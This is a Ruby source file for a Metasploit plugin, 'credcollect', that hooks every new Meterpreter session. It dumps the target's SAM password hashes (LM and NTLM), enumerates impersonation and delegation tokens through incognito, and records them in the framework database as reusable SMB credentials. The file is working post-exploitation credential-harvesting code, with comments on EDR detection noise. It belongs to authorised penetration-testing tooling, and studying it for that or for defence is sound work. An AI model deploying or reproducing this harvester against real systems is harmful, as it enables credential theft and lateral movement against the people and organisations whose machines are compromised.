# credcollect - tebo[at]attackresearch.com
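module Msf
  # Session subscriber that harvests SAM hashes and impersonation/delegation
  # tokens from every newly opened Meterpreter session and records them in the
  # framework database.
  #
  # Operational caveat: this fires automatically on *every* session open with no
  # per-session opt-out. Dumping the SAM and enumerating tokens touches the SAM
  # hive / LSASS and is a well-known EDR trigger, so load the plugin only when
  # that noise is acceptable for the engagement. Harvesting is best-effort: a
  # failure to dump is reported to the console and never tears down the session.
  class Plugin::CredCollect < Msf::Plugin
    include Msf::SessionEvent

    # Port recorded on the auth entries; SAM hashes are usable as SMB creds.
    # The original author noted this really ought to come from the exploit's
    # datastore — use the meterpreter script instead if it must vary per target.
    SMB_PORT = 445

    # Console commands kept only so old muscle memory gets pointed at the
    # modern `creds` / `notes` replacements.
    class CredCollectCommandDispatcher
      include Msf::Ui::Console::CommandDispatcher

      def name
        'credcollect'
      end

      def commands
        {
          'db_hashes' => "Dumps hashes (deprecated: use 'creds -s smb')",
          'db_tokens' => "Dumps tokens (deprecated: use 'notes -t smb_token')"
        }
      end

      # @deprecated use `creds -s smb`
      # Accepts (and ignores) arguments so `db_hashes foo` prints the hint
      # instead of raising ArgumentError from the dispatcher's send.
      def cmd_db_hashes(*_args)
        print_error ''
        print_error "db_hashes is deprecated. Use 'creds -s smb' instead."
        print_error ''
      end

      # @deprecated use `notes -t smb_token`
      def cmd_db_tokens(*_args)
        print_error ''
        print_error "db_tokens is deprecated. Use 'notes -t smb_token' instead."
        print_error ''
      end
    end

    # Fired by the framework for every new session. Announces itself on any
    # session (as the original did), but only harvests from Meterpreter sessions
    # and only when a database is connected.
    #
    # @param session [Msf::Session] the session that just opened
    # @return [void]
    def on_session_open(session)
      return unless framework.db.active

      print_status('This is CredCollect, I have the conn!')
      return unless session.type == 'meterpreter'

      # Target address for the db records.
      addr = session.sock.peerhost
      record_sam_hashes(session, addr)
      record_tokens(session, addr)
    end

    # Intentionally a no-op; nothing per-session is held by this plugin.
    def on_session_close(session, reason = ''); end

    def initialize(framework, opts)
      super
      self.framework.events.add_session_subscriber(self)
      add_console_dispatcher(CredCollectCommandDispatcher)
    end

    def cleanup
      framework.events.remove_session_subscriber(self)
      remove_console_dispatcher('credcollect')
    end

    def name
      'db_credcollect'
    end

    def desc
      'Automatically grab hashes and tokens from Meterpreter session events and store them in the database'
    end

    private

    # Load the priv extension, dump the SAM and write one 'smb_hash' auth record
    # per account. Any failure (non-Windows Meterpreter, not SYSTEM, session
    # died mid-dump) is printed and swallowed: a harvesting problem must not
    # propagate out of the session-open event.
    #
    # NOTE(review): report_auth_info is the legacy DB API; confirm it is still
    # provided by the framework version this plugin is loaded into.
    #
    # @param session [Msf::Session] open Meterpreter session
    # @param addr [String] peer address used as the record's host
    # @return [void]
    def record_sam_hashes(session, addr)
      session.core.use('priv')
      hashes = session.priv.sam_hashes

      hashes.each do |hash|
        data = {
          host: addr,
          port: SMB_PORT,
          sname: 'smb',
          user: hash.user_name,
          pass: "#{hash.lanman}:#{hash.ntlm}",
          type: 'smb_hash',
          active: true
        }
        framework.db.report_auth_info(data)
      end
      print_status("credcollect: recorded #{hashes.length} SAM hash(es) from #{addr}")
    rescue StandardError => e
      print_error("credcollect: SAM dump failed on #{addr}: #{e.class}: #{e.message}")
    end

    # Load incognito, list the available tokens and store each as an
    # 'smb_token' note, de-duplicated on the token text. Failures are reported
    # and swallowed for the same reason as in record_sam_hashes.
    #
    # @param session [Msf::Session] open Meterpreter session
    # @param addr [String] peer address used as the note's host
    # @return [void]
    def record_tokens(session, addr)
      session.core.use('incognito')

      # incognito hands back a hash of preformatted, newline-delimited strings
      # rather than structured data, so flatten it to one token per line.
      # Non-bang strip: the original used strip!, which returns nil when there
      # is nothing to strip and then crashed on nil.split.
      raw = session.incognito.incognito_list_tokens(0).values.join
      tokens = raw.strip.split("\n").reject(&:empty?)

      tokens.each do |token|
        data = {
          host: addr,
          type: 'smb_token',
          data: token,
          update: :unique_data
        }
        framework.db.report_note(data)
      end
    rescue StandardError => e
      print_error("credcollect: token enumeration failed on #{addr}: #{e.class}: #{e.message}")
    end
  end
end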